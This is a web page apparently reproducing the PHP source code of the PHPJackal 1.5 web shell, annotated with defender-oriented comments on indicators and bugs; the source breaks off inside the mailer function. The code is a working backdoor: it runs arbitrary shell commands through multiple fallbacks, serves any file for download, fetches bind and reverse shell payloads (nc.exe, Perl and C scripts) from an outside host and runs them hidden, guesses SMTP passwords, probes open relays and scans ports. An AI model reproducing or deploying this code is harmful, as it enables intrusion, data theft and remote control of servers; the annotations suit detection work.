
PHPJackal Shell

19 Feb 2014

PHPJackal v$v – Powered By NetJackal

PHPJackal Shell Source Code

<?php
// PHPJackal 1.5 — a PHP web shell (remote-administration backdoor). Everything below is reachable
// by whoever can request this file; its presence on a server is a compromise indicator.
#--Config--#
$login_password= ''; //Set password
// NOTE: while this stays empty the password gate further down is skipped entirely, so the shell is
// open to any client that finds the URL.
#----------#
error_reporting(E_ALL);
// Lift execution and memory limits for the long-running scanner/shell actions. set_time_limit(0)
// and ini_set('memory_limit', ...) issued from a web request are themselves worth alerting on.
set_time_limit(0);
ini_set("max_execution_time","0");
ini_set("memory_limit","9999M");
// PHP 4-era compatibility: set_magic_quotes_runtime() was removed in PHP 7.0 and
// get_magic_quotes_gpc() in PHP 8.0, so this file fatals on load under current PHP.
set_magic_quotes_runtime(0);
if(!isset($_SERVER))$_SERVER = &$HTTP_SERVER_VARS;
if(!isset($_POST))$_POST = &$HTTP_POST_VARS;
if(!isset($_GET))$_GET = &$HTTP_GET_VARS;
if(!isset($_COOKIE))$_COOKIE=$HTTP_COOKIE_VARS;
// Every handler reads $_REQUEST, rebuilt here from GET+POST only (cookies excluded); log and WAF
// rules therefore have to inspect both the query string and the body for the parameter names
// used below (workingdiR, downloaD, imagE, cmd, ...).
$_REQUEST = array_merge($_GET, $_POST);
if (get_magic_quotes_gpc()){
foreach ($_REQUEST as $key=>$value)
{
$_REQUEST[$key]=stripslashes($value);
}
}
  21 function hlinK($str=""){
  22 $myvars=array('workingdiR','urL','imagE','namE','filE','downloaD','seC','cP','mV','rN','deL');
  23 $ret=$_SERVER['PHP_SELF']."?";
  24 $new=explode("&",$str);
  25 foreach ($_GET as $key => $v){
  26 $add=1;
  27 foreach($new as $m){
  28 $el = explode("=", $m);
  29 if ($el[0]==$key)$add=0;
  30 }
  31 if($add)if(!in_array($key,$myvars))$ret.=$key."=".$v."&";
  32 }
  33 $ret.=$str;
  34 return $ret;
  35 }
// Password gate (active only when $login_password is non-empty). Login state is a cookie named
// 'passw' holding the unsalted MD5 of the password, compared with loose '!='; the value is the same
// for every session of a deployment, so a 32-hex 'passw' cookie is a usable request-log marker.
if(!empty($login_password)){
if(!empty($_REQUEST['fpassw'])){
if($_REQUEST['fpassw']==$login_password)setcookie('passw',md5($_REQUEST['fpassw']));
// Redirect without exit(): the rest of this request keeps executing.
@header("Location: ".hlinK());
}
// The login form always posts the hidden pair seC=about + fpassw — a fixed shape for a signature.
if(empty($_COOKIE['passw']) || $_COOKIE['passw']!=md5($login_password))die("<html><body><table><form method=post><tr><td>Password:</td><td><input type=hidden name=seC value=about><input type=password name=fpassw></td></tr><tr><td></td><td><input type=submit value=login></td></tr></form></table></body></html>");
}
// The working directory follows an unvalidated request parameter; every later file and shell
// action runs relative to it.
if (!empty($_REQUEST['workingdiR'])) chdir($_REQUEST['workingdiR']);
// Port probe used by the scanner UI. $type 0: plain TCP connect through fsockopen (errno/errstr in
// $n/$s are discarded). Otherwise a UDP heuristic: send one NUL byte and, if the 1-byte read blocks
// for the whole $timeout, report the port as open — silence counts as open, so filtered ports are
// reported open too, and the socket is not closed when the read returns early.
// Returns 1 for "open", 0 otherwise. The visible side effect is outbound connects from the web
// server's worker process.
function checkthisporT($ip,$port,$timeout,$type=0){
if(!$type){
$scan=@fsockopen($ip,$port,$n,$s,$timeout);
if($scan){fclose($scan);return 1;}
}
elseif(function_exists('socket_set_timeout')){
$scan=@fsockopen("udp://".$ip,$port);
if($scan){
socket_set_timeout($scan,$timeout);
@fwrite($scan,"\x00");
$s=time();
fread($scan,1);
if((time()-$s)>=$timeout){fclose($scan);return 1;}
}
}
return 0;
}
  61 if (!function_exists("file_get_contents")){
  62 function file_get_contents($addr){
  63 $a = fopen($addr,"r");
  64 $tmp = fread($a,filesize($a));
  65 fclose($a);
  66 if($a)return $tmp;
  67 }
  68 }
  69 if (!function_exists("file_put_contents")){
  70 function file_put_contents($addr,$con){
  71 $a = fopen($addr,"w");
  72 if(!$a)return 0;
  73 fwrite($a,$con);
  74 fclose($a);
  75 return strlen($con);
  76 }
  77 }
  78 function flusheR(){
  79 flush();@ob_flush();
  80 }
// File download handler: whatever path (or URL wrapper, since file_get_contents is used) is named
// in downloaD is streamed back as an attachment — no base-directory restriction, and the value is
// interpolated raw into the Content-disposition header. A request carrying downloaD is a direct
// indicator of data being pulled out through this shell.
if (!empty($_REQUEST['downloaD'])){
@ob_clean();
$dl=$_REQUEST['downloaD'];
$con=file_get_contents($dl);
header("Content-type: application/octet-stream");
header("Content-disposition: attachment; filename=\"$dl\";");
header("Content-length: ".strlen($con));
echo $con;
exit;
}
// Inline image viewer with the same unrestricted read. The literal "imagE/gif" content type is sent
// as written (mixed case) and is a distinctive string in responses from this shell.
if (!empty($_REQUEST['imagE'])){
$img=$_REQUEST['imagE'];
header("Content-type: imagE/gif");
header("Content-length: ".filesize($img));
header("Last-Modified: ".date("r",filemtime($img)));
echo file_get_contents($img);
exit;
}
// Fixed anti-cache headers; the 1987 Expires value is another response-level marker.
@header("Cache-Control: no-cache, must-revalidate");
@header("Expires: Mon, 7 Aug 1987 05:00:00 GMT");
 101 function showsizE($size){
 102 if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB";
 103 elseif ($size>=1048576)$size = round(($size/1048576),2)." MB";
 104 elseif ($size>=1024)$size = round(($size/1024),2)." KB";
 105 else $size .= " B";
 106 return $size;
 107 }
// php_unamE() resolves to php_uname() because PHP function names are case-insensitive; the same
// mixed-case spelling (hlinK, shelL, namE, ...) runs through the whole file and is a stable trait
// to key a content signature on.
if (substr((strtoupper(php_unamE())),0,3)=="WIN") $windows=1; else $windows=0;
// Shared HTML fragments for the UI. The fixed strings below (the version, the "Powered By NetJackal"
// footer with its netjackal.by.ru link, the author/contact block) identify this shell family in
// served pages.
$errorbox = "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td><b>Error: </b>";
$et = "</td></tr></table>";
$v="1.5";
$msgbox="<br><table border=0 cellpadding=0 cellspacing=0
 style=\"border-collapse: collapse\" bordercolor=\"#282828\"
 bgcolor=\"#333333\" width=\"100%\"><tr><td align=\"center\">";
$intro="<center><table border=0 style=\"border-collapse: collapse\"
 bordercolor=\"#282828\"><tr><td bgcolor=\"#330000\"><b>Script:</b><br>"
 .str_repeat("-=-",25)."<br><b>Name:</b> Egyptian Hacker<br><b>Version:</b>
  $v<br><br><b>Author:</b>
  <br>".str_repeat("-=-",25)."<br>
  <b>Name:</b> Elswify Scripts<br><b>Country:</b>
  Egypt<br><b>Email:</b> <a href=\"mailto:elswifymoka122@yahoo.com?subject=PHPJackal\">elswifymoka122@yahoo.com</a><br></font>$et</center>";
$footer="${msgbox}PHPJackal v$v - Powered By <a href=\"http://netjackal.by.ru\" target=\"_blank\">NetJackal</a>$et";
// Hidden field that carries the current directory through every form (name=workingdiR).
$hcwd="<input type=hidden name=workingdiR value=\"".getcwd()."\">";
$t = "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#333333\">";
// Form for the dictionary / combo (user:pass) password-guessing module; the handler that consumes
// the dictionary/combo/user/target fields is not in this excerpt.
$crack="</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\" name=form><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>";
 126 function namE(){
 127 $name='';
 128 srand((double)microtime()*100000);
 129 for ($i=0;$i<=rand(3,10);$i++){
 130 $name.=chr(rand(97,122));
 131 }
 132 return $name;
 133 }
 134 function whereistmP(){
 135 $uploadtmp=ini_get('upload_tmp_dir');
 136 $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
 137 if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
 138 if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
 139 if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
 140 if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
 141 if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
 142 return ".";
 143 }
// Run $command through whichever execution primitive is still usable, trying in order: passthru,
// system, exec, shell_exec, popen, proc_open, then the WScript.Shell COM object on Windows.
// Availability is judged by is_callable() plus a substring test of disable_functions (so disabling
// shell_exec also hides exec, because strstr matches the substring). Returns captured output as a
// string. Defensive takeaway: listing only exec/system/passthru in disable_functions leaves popen,
// proc_open and COM available; a PHP worker spawning sh or cmd.exe is the behaviour to detect.
// Quirks visible here: the system() branch returns the buffer captured *before* the command ($tmp),
// not $output; the popen branch keeps only the last fgets() line; the COM branch builds the temp
// file name without a directory separator and never uses $dir.
function shelL($command){
global $windows,$disablefunctions;
$exec = '';$output= '';
$dep[]=array('pipe','r');$dep[]=array('pipe','w');
if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();}
elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; }
elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("\n",$output);$exec= $output;}
elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);}
elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);}
elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);}
elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);}
return $exec;
}
// Fetch $get and write it to the local path $put; returns 1 when the write reports a non-zero
// length, else 0. Uses file_get_contents when allow_url_fopen looks enabled, otherwise a
// hand-rolled HTTP/1.0 GET over fsockopen to port 80 with a fixed "Konqueror/3.1; FreeBSD"
// User-Agent (a usable egress-log marker). The allow_url_fopen test is loose: $fo is a string, so
// any non-empty value such as "off" is truthy and still takes the file_get_contents path; the
// fallback never checks the fsockopen result. Callers in this file use it to pull the backdoor
// payloads from netjackal.by.ru and the nikto scan database.
function downloadiT($get,$put){
$fo=@strtolower(ini_get('allow_url_fopen'));
if($fo || $fo=='on')$con=file_get_contents($get);
else{
$u=parse_url($get);
$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
$url=fsockopen($host, 80, $en, $es, 12);
fputs($url, "GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");
$tmp=$con='';
// Skip response headers up to the blank line, then read the body to EOF.
while($tmp!="\r\n")$tmp=fgets($url);
while(!feof($url))$con.=fgets($url);
}
$mk=file_put_contents($put,$con);
if($mk)return 1;
return 0;
}
// Attempt SMTP AUTH LOGIN against $addr:25 with $user/$pass. Returns -1 if the connection fails,
// 0 if any step is refused, 1 on a 235 success. Credentials travel base64-encoded in clear text,
// the socket is never closed, and the EHLO name is a random namE() token that stands out in mail
// server logs. The caller is not in this excerpt.
function smtplogiN($addr,$user,$pass,$timeout){
$sock=fsockopen($addr,25,$n,$s,$timeout);
if(!$sock)return -1;
fread($sock,1024);
fputs($sock,'ehlo '.namE()."\r\n");
$res=substr(fgets($sock,512),0,1);
if($res!='2')return 0;
// Assumes exactly three more EHLO response lines; servers advertising more or fewer extensions desync here.
fgets($sock,512);fgets($sock,512);fgets($sock,512);
fputs($sock,"AUTH LOGIN\r\n");
$res=substr(fgets($sock,512),0,3);
if($res!='334')return 0;
fputs($sock,base64_encode($user)."\r\n");
$res=substr(fgets($sock,512),0,3);
if($res!='334')return 0;
fputs($sock,base64_encode($pass)."\r\n");
$res=substr(fgets($sock,512),0,3);
if($res!='235')return 0;
return 1;
}
// Open-relay probe: HELO with a random name, MAIL FROM a random address at a random .com domain,
// RCPT TO a fixed external mailbox (contact@persianblog.com), then a DATA body of random tokens.
// A 250 after DATA is reported as "relay" (return 1); -1 means no connection, 0 any refusal.
// When the server accepts, a real message is injected, so mail logs showing gibberish HELO /
// Subject values addressed to that recipient are the trace this leaves. The socket is never closed.
function checksmtP($host,$timeout){
$from=strtolower(namE())."@".strtolower(namE()).".com";
$sock=@fsockopen($host,25,$n,$s,$timeout);
if(!$sock)return -1;
$res=substr(fgets($sock,512),0,3);
if($res!='220')return 0;
fputs($sock,'HELO '.namE()."\r\n");
$res=substr(fgets($sock,512),0,3);
if($res!='250')return 0;
fputs($sock,"MAIL FROM: <$from>\r\n");
$res=substr(fgets($sock,512),0,3);
if($res!='250')return 0;
fputs($sock,"RCPT TO: <contact@persianblog.com>\r\n");
$res=substr(fgets($sock,512),0,3);
if($res!='250')return 0;
fputs($sock,"DATA\r\n");
$res=substr(fgets($sock,512),0,3);
if($res!='354')return 0;
fputs($sock,"From: ".namE()." ".namE()." <$from>\r\nSubject: ".namE()."\r\nMIME-Version: 1.0\r\nContent-Type: text/plain;\r\n\r\n".namE().namE().namE()."\r\n.\r\n");
$res=substr(fgets($sock,512),0,3);
if($res!='250')return 0;
return 1;
}
// HTTP probe for the web-vulnerability scanner: connects to the URL's host on port 80, sends
// $method for its path (+query), then looks either for a 200 status (the default when $search is
// empty) or for $search as a substring of any response line. Returns 1 on a match, 0 otherwise;
// $timeout applies to the connect only.
// Defect: `elseif($method='POST')` assigns rather than compares, so every non-GET method is sent as
// a POST and the trailing `return 0` is unreachable. The POST body is the URL's query string, which
// is also still appended to the request line. On the status path the socket is closed immediately;
// on the substring path only after EOF.
function check_urL($url,$method,$search,$timeout){
if(empty($search))$search='200';
$u=parse_url($url);
$method=strtoupper($method);
$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
$data=(!empty($u['query']))?$u['query']:'';
if(!empty($data))$data="?$data";
$sock=@fsockopen($host,80,$en,$es,$timeout);
if($sock){
fputs($sock,"$method $file$data HTTP/1.0\r\n");
fputs($sock,"Host: $host\r\n");
if($method=='GET')fputs($sock,"\r\n");
elseif($method='POST')fputs($sock,"Content-Type: application/x-www-form-urlencoded\r\nContent-length: ".strlen($data)."\r\nAccept-Encoding: text\r\nConnection: close\r\n\r\n$data");
else return 0;
if($search=='200')if(substr(fgets($sock),0,3)=="200"){fclose($sock);return 1;}else {fclose($sock);return 0;}
while(!feof($sock)){
$res=trim(fgets($sock));
if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;}
}
fclose($sock);
}
return 0;
}
// Request a random, non-existent page from $host:80 to elicit the Server: response header.
// Returns the header value (everything after the first space, trailing newline included), -1 when
// no Server: line appears before EOF, 0 when the connection fails. The socket is leaked on the
// early return inside the loop.
function get_sw_namE($host,$timeout){
$sock=@fsockopen($host,80,$en,$es,$timeout);
if($sock){
$page=namE().namE();
fputs($sock,"GET /$page HTTP/1.0\r\n\r\n");
while(!feof($sock)){
$con=fgets($sock);
if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;}
}
fclose($sock);
return -1;
}return 0;
}
// Single SNMPv1 GetRequest for sysDescr.0 (OID 1.3.6.1.2.1.1.1.0, the 2B 06 01 02 01 01 01 00 bytes
// below) with community $com, sent over UDP to $ip:161; returns the raw first line of the reply,
// or false when nothing arrives within $timeout. The BER lengths are hard-coded: the outer
// SEQUENCE length byte 0x26 is only consistent with a 6-byte community, so other community lengths
// yield a malformed packet. fsockopen's result is not checked before socket_set_timeout; $res=0 is
// dead scaffolding and $n is just a NUL byte.
function snmpchecK($ip,$com,$timeout){
$res=0;
$n=chr(0x00);
$packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01). chr(0x00). chr(0x04). chr(strlen($com)). 
$com. chr(0xA0). 
chr(0x19). chr(0x02). chr(0x01). chr(0x01). chr(0x02). chr(0x01). $n.
chr(0x02). chr(0x01). $n. chr(0x30). chr(0x0E). chr(0x30). chr(0x0C).
chr(0x06). chr(0x08). chr(0x2B). chr(0x06). chr(0x01). chr(0x02). chr(0x01).
chr(0x01). chr(0x01). $n. chr(0x05). $n;
$sock=@fsockopen("udp://$ip",161);
socket_set_timeout($sock,$timeout);
@fputs($sock,$packet);
socket_set_timeout($sock,$timeout);
$res=fgets($sock);
fclose($sock);
return $res;
}
 268 
// Try to drop safe_mode / open_basedir restrictions via ini_restore(). That only undoes values set
// at runtime, not those fixed in php.ini, and safe_mode itself was removed in PHP 5.4.
// disable_functions is read here so shelL() can skip blocked execution primitives.
$safemode=(@ini_get('safe_mode') or strtolower(@ini_get('safe_mode')) == 'on')?'ON':'OFF';
if($safemode=="ON"){@ini_restore("safe_mode");@ini_restore("open_basedir");}
$disablefunctions = @ini_get('disable_functions');
 272 if (!function_exists("str_repeat")){
 273 function str_repeat($str,$c){
 274 $r="";
 275 for($i=0; $i < $cu; $i++)$r.=$str;
 276 return $r;
 277 }
 278 }
 279 
// Bind / reverse shell deployer. With `port` (bind) or `rport`+`ip` (reverse) set, it downloads a
// payload from http://netjackal.by.ru/backdoor (nc.exe, winbind.pl, winrc.pl on Windows; bind.c,
// bind.pl, rc.c, rc.pl elsewhere) into the temp directory under a random name — dot-prefixed on
// Unix, `attrib +H` on Windows — then compiles it with gcc or launches it via perl / nc.exe.
// Without those parameters it prints the two forms (defaults: bind port 55501, reverse port 53,
// reverse IP pre-filled with the requester's REMOTE_ADDR). Things a defender can watch for: the PHP
// worker spawning gcc, perl, attrib or nc; outbound HTTP to that host; random dot-files in /tmp;
// new listeners on high ports. Only the ports are cast to int; `ip` is interpolated unescaped into
// the shell commands. C=1 selects the compiled/EXE variant, otherwise the Perl one. `which perl` is
// run twice because of the nested assignment on the $perl line.
function brshelL(){
global $errorbox, $windows,$et,$hcwd;
$_REQUEST['C']=(isset($_REQUEST['C']))?$_REQUEST['C']:0;
$addr='http://netjackal.by.ru/backdoor';
$error="$errorbox Can not make backdoor file, go to writeable folder.$et";
$n=namE();
if(!$windows)$n=".$n";
$d=whereistmP();
$name=$d.DIRECTORY_SEPARATOR.$n;
$perl=(!$windows && shelL('which perl'))?$perl=shelL('which perl'):'perl';
$c=($_REQUEST['C'])?1:0;
if (!empty($_REQUEST['port']) && ($_REQUEST['port']<=65535) && ($_REQUEST['port']>=1) ){
$port=(int)$_REQUEST['port'];
if($windows){
if($c){
$name.=".exe";
$bd=downloadiT("$addr/nc.exe",$name);
shelL("attrib +H $name");
if(!$bd)echo $error;else shelL("$name -L -p $port -e cmd.exe");
}else{
$name = $name.".pl";
$bd=downloadiT("$addr/winbind.pl",$name);
shelL("attrib +H $name");
if(!$bd)echo $error;else shelL("perl.exe $name $port");
}
}
else{
if($c){
$bd=downloadiT("$addr/bind.c",$name);
if (!$bd) echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $port &");
}else{
$bd=downloadiT("$addr/bind.pl",$name);
if (!$bd)echo $error; else shelL("cd $d;$perl $n $port &");
echo "<font color=blue>Backdoor is waiting for you on $port.<br></font>";
}
}
}
elseif(!empty($_REQUEST['rport']) && ($_REQUEST['rport']<=65535) && ($_REQUEST['rport']>=1) && !empty($_REQUEST['ip'])){
$ip=$_REQUEST['ip'];
$port=(int)$_REQUEST['rport'];
if($windows){
if($c){
$name.='.exe';
$bd=downloadiT("$addr/nc.exe",$name);
shelL("attrib +H $name");
if(!$bd)echo $error;else shelL("$name $ip $port -e cmd.exe");
}else{
$name = $name.".pl";
$bd=downloadiT("$addr/winrc.pl",$name);
shelL("attrib +H $name");
if (!$bd)echo $error; else shelL("perl.exe $name $ip $port");
}
}
else{
if($c){
$bd=downloadiT("$addr/rc.c",$name);
if(!$bd) echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $ip $port &");
}else{
$bd=downloadiT("$addr/rc.pl",$name);
if(!$bd)echo $error;else shelL("cd $d;$perl $n $ip $port &");
}
}
echo "<font color=blue>Done!</font>";}
else{echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><tr><td><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"50%\"><tr><td width=\"50%\" bgcolor=\"#333333\">Bind shelL:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Port:</td><td bgcolor=\"#666666\"><input type=text name=port value=55501 size=5></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Type:</td><td bgcolor=\"#808080\"><input type=radio style=\"border-width:1px;background-color:#808080;\" value=0 checked name=C>PERL<input type=radio style=\"border-width:1px;background-color:#808080;\" name=C value=1>"; if($windows)echo "EXE"; else echo "C";echo"</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input type=submit class=buttons value=Bind></td></tr></form></table></td><td><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"50%\"><tr><td width=\"40%\" bgcolor=\"#333333\">Reverse shelL:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#808080\">IP:</td><td bgcolor=\"#808080\"><input type=text name=ip value=";echo $_SERVER["REMOTE_ADDR"]; echo " size=17></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Port:</td><td bgcolor=\"#666666\"><input type=text name=rport value=53 size=5></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Type:</td><td bgcolor=\"#808080\"><input type=radio style=\"border-width:1px;background-color:#808080;\" value=0 checked name=C>PERL<input type=radio style=\"border-width:1px;background-color:#808080;\" name=C value=1>"; if($windows)echo "EXE"; else echo "C";echo"</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Connect></td></tr></form></table>$et";}}
 344 function showimagE($img){
 345 echo "<center><img border=0 src=\"".hlinK("imagE=$img&&workingdiR=".getcwd())."\"></center>";}
// File viewer/editor form. For an existing file it reads the content (readability/writability
// only produce warnings; there is no path restriction) into a textarea; otherwise it shows an empty
// editor seeded with the cwd. The Open/Save handling of the posted `file`/`edited` fields lives
// elsewhere (not in this excerpt). The path is HTML-escaped in the first input but echoed raw in
// the second one.
function editoR($file){
global $errorbox,$et,$hcwd;
if (is_file($file)){
if (!is_readable($file)){echo "$errorbox File is not readable$et<br>";}
if (!is_writeable($file)){echo "$errorbox File is not writeable$et<br>";}
$data = file_get_contents($file);
echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"10%\" bgcolor=\"#808080\"><form method=\"POST\">$hcwd<input type=text value=\"".htmlspecialchars($file)."\" size=75 name=file><input type=submit class=buttons name=Open value=Open></td></tr></form></table><br><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#666666\"><form method=\"POST\"><textarea rows=\"18\" name=\"edited\" cols=\"64\">";
echo htmlspecialchars($data);
echo "</textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"><input type=text value=\"$file\" size=80 name=file></td></tr><td width=\"40%\" bgcolor=\"#666666\" align=\"right\">";
}
else {echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"10%\" bgcolor=\"#808080\"><form method=\"POST\"><input type=text value=\"".getcwd()."\" size=75 name=file>$hcwd<input type=submit class=buttons name=Open value=Open></td></tr></form></table><br><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#666666\"><form method=\"POST\"><textarea rows=\"18\" name=\"edited\" cols=\"63\"></textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"><input type=text value=\"".getcwd()."\" size=80 name=file></td></tr><td width=\"40%\" bgcolor=\"#666666\" align=\"right\">";
}
echo "$hcwd<input type=submit class=buttons name=Save value=Save></td></form></tr></table></center>";
}
// Command console. Prints a directory-change form, runs $_REQUEST['cmd'] through shelL() and drops
// the raw output into a <textarea> (no escaping, so output containing </textarea> breaks the page),
// then a dropdown of canned recon commands chosen by platform (cPanel paths are added when present).
// On Unix the command box is pre-filled with `cat /etc/passwd`. Requests carrying both `cmd` and
// `workingdiR` are the characteristic shape of this handler in access logs.
function webshelL(){
global $windows,$hcwd;
if($windows){
$alias="<option value=\"netstat -an\">Display open ports</option><option value=\"tasklist\">List of processes</option><option value=\"systeminfo\">System information</option><option value=\"ipconfig /all\">IP configuration</option><option value=\"getmac\">Get MAC address</option><option value=\"net start\">Services list</option><option value=\"net view\">Machines in domain</option><option value=\"net user\">Users list</option><option value=\"gpresult\">Group policy</option><option value=\"shutdown -s -f -t 1\">Turn off the server</option>";
}
else{
$alias="<option value=\"netstat -an | grep -i listen\">Display open ports</option><option value=\"last -a -n 250 -i\">Show last 250 logged in users</option><option value=\"which wget curl lynx w3m\">Downloaders</option><option value=\"find / -perm -2 -type d -print\">Find world-writable directories</option><option value=\"find . -perm -2 -type d -print\">Find world-writable directories(in current directory)</option><option value=\"find / -perm -2 -type f -print\">Find world-writable files</option><option value=\"find . -perm -2 -type f -print\">Find world-writable files(in current directory)</option><option value=\"find / -type f -perm 04000 -ls\">Find files with SUID bit set</option><option value=\"find / -type f -perm 02000 -ls\">Find files with SGID bit set</option><option value=\"find / -name .htpasswd -type f\">Find .htpasswd files</option><option value=\"find / -type f -name .bash_history\">Find .bash_history files</option><option value=\"cat /etc/syslog.conf\">View syslog.conf</option><option value=\"cat cat /etc/hosts\">View hosts</option><option value=\"ps auxw\">List of processes</option>";
if(is_dir('/etc/valiases'))$alias.="<option value=\"ls -l /etc/valiases\">List of Cpanel`s domains(valiases)</option>";if(is_dir('/etc/vdomainaliases'))$alias.="<option value=\"ls -l /etc/vdomainaliases\">List Cpanel`s domains(vdomainaliases)</option>";if(file_exists('/var/cpanel/accounting.log'))$alias.="<option value=\"cat /var/cpanel/accounting.log\">Display Cpanel`s log</option>";
if(is_dir('/var/spool/mail/'))$alias.="<option value=\"ls /var/spool/mail/\">Mailboxes list</option>";
}
echo "<center><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"65%\"><form method=\"POST\"><tr><td width=\"20%\"><b>Location:</b><input type=text name=workingdiR size=82 value=\"".getcwd()."\"><input class=buttons type=submit value=Change></td></tr></form></table><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"65%\"><tr><td><b>Web Shell:</b></td></tr><td bgcolor=\"#666666\"><textarea rows=\"22\" cols=\"78\">";
if (!empty($_REQUEST['cmd'])) echo shelL($_REQUEST['cmd']);
echo"</textarea></td></tr><form method=post><tr><td bgcolor=\"#808080\"><input type=text size=91 name=cmd value=\"";if (!empty($_REQUEST['cmd'])) echo htmlspecialchars(($_REQUEST['cmd']));elseif(!$windows) echo "cat /etc/passwd";echo "\">$hcwd<input class=buttons type=submit value=Execute></td></tr></form></td></tr><form method=post><tr><td bgcolor=\"#808080\"><select name=\"cmd\" width=70>$alias</select>$hcwd<input class=buttons type=submit value=Execute></td></tr></form></table></table><center>";
}
// Mailer: sends a message through PHP's mail() with the request's to/from/subject/body and then
// prints the form again. `break` here is not inside any loop or switch; PHP treats that as a fatal
// error ("Cannot break/continue 1 level"), and since 7.0 it is rejected at compile time, so the file
// cannot load at all on current PHP. $from is placed unfiltered into the From: header (header
// injection). The prefilled From, Subject and body strings are fixed and identify this form in
// outbound mail.
function maileR(){
global $msgbox,$et,$hcwd;
$cwd= getcwd();
if (!empty($_REQUEST['subject'])&&!empty($_REQUEST['body'])&&!empty($_REQUEST['from'])&&!empty($_REQUEST['to'])){
$to=$_REQUEST['to'];$from=$_REQUEST['from'];$subject=$_REQUEST['subject'];$body=$_REQUEST['body'];
if (!mail($to,$subject,$body,"From: $from"))break;
echo "$msgbox<b>Mail sent!</b><br>$et";
}
